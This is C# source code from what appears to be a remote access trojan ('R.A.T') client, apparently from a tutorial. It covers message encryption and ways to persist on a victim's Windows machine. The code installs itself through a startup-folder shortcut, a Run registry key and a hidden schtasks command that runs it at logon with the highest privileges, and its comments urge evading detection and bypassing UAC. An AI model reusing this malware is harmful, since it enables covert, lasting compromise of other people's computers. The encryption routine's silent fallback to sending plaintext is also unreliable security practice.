/// <summary>
/// Encrypt data
/// </summary>
/// <param name="clearText">The message to encrypt</param>
/// <returns>The encrypted Base64 CipherText</returns>
public string Encrypt(string clearText)
{
try
{
byte[] clearBytes = Encoding.Unicode.GetBytes(clearText); //Bytes of the message
using (Aes encryptor = Aes.Create()) //Create a new AES decryptor
{
//Encrypt the data
Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(ENCRYPTION_KEY, new byte[] { 0x49, 0x76, 0x61, 0x6e, 0x20, 0x4d, 0x65, 0x64, 0x76, 0x65, 0x64, 0x65, 0x76 });
encryptor.Key = pdb.GetBytes(32);
encryptor.IV = pdb.GetBytes(16);
using (MemoryStream ms = new MemoryStream())
{
using (CryptoStream cs = new CryptoStream(ms, encryptor.CreateEncryptor(), CryptoStreamMode.Write))
{
cs.Write(clearBytes, 0, clearBytes.Length);
cs.Close();
}
clearText = Convert.ToBase64String(ms.ToArray());
}
}
return(clearText); //Return the encrypted text
}
catch (Exception) //Something went wrong
{
_reportHelper.ReportError(ErrorType.ENCRYPT_DATA_CORRUPTED, "Can't encrypt message!", "Message encryption failed!"); //Report error to server
return(clearText); //Send the plain text data
}
}
/// <summary>
/// Probe the startup
/// </summary>
/// <param name="pm">The method to use</param>
public void ProbeStart(ProbeMethod pm)
{
if (pm == ProbeMethod.StartUpFolder) //Probe starup folder
{
var suFolder = Environment.GetFolderPath(Environment.SpecialFolder.Startup); //Get the path of the startup folder
var linkFile = suFolder + "\\" + "client.lnk"; //Be creative if you want to get away with it :)
if (!File.Exists(linkFile))
{
CreateShortcut(linkFile, Application.ExecutablePath); //Create the new link file
}
}
else if (pm == ProbeMethod.Registry) //Probe the registry
{
if (!IsAdmin()) //Check if client is admin
{
//Report error to the server
_reportHelper.ReportError(ErrorType.ADMIN_REQUIRED, "Failed to probe registry", "R.A.T is not running as admin! You can try to bypass the uac or use the startup folder method!");
return; //Return
}
RegistryKey key = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run", true); //Get the usual registry key
if (key.GetValue("tut_client") != null)
{
key.DeleteValue("tut_client", false); //Check and remove value
}
key.SetValue("tut_client", Application.ExecutablePath); //Add the new value
//Close and dispose the key
key.Close();
key.Dispose();
key = null;
}
else if (pm == ProbeMethod.TaskScheduler) //Probe TaskScheduler
{
if (!IsAdmin()) //Check if client is admin
{
//Report error to the server
_reportHelper.ReportError(ErrorType.ADMIN_REQUIRED, "Failed to probe Task Scheduler", "R.A.T is not running as admin! You can try to bypass the uac or use the startup folder method!");
return; //Return
}
Process deltask = new Process(); //Delete previous task
Process addtask = new Process(); //Create the new task
deltask.StartInfo.FileName = "cmd.exe"; //Execute the cmd
deltask.StartInfo.Arguments = "/c schtasks /Delete tut_client /F"; //Set tasksch command
deltask.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; //Hidden process
deltask.Start(); //Delete the task
deltask.WaitForExit(); //Wait for it to finish
//Console.WriteLine("Delete Task Completed");
addtask.StartInfo.FileName = "cmd.exe"; //Execute the cmd
addtask.StartInfo.Arguments = "/c schtasks /Create /tn tut_client /tr \"" + Application.ExecutablePath + "\" /sc ONLOGON /rl HIGHEST"; //Set tasksch command
addtask.Start(); //Add the new task
addtask.WaitForExit(); //Wait for it to finish
//Console.WriteLine("Task created successfully!");
}
}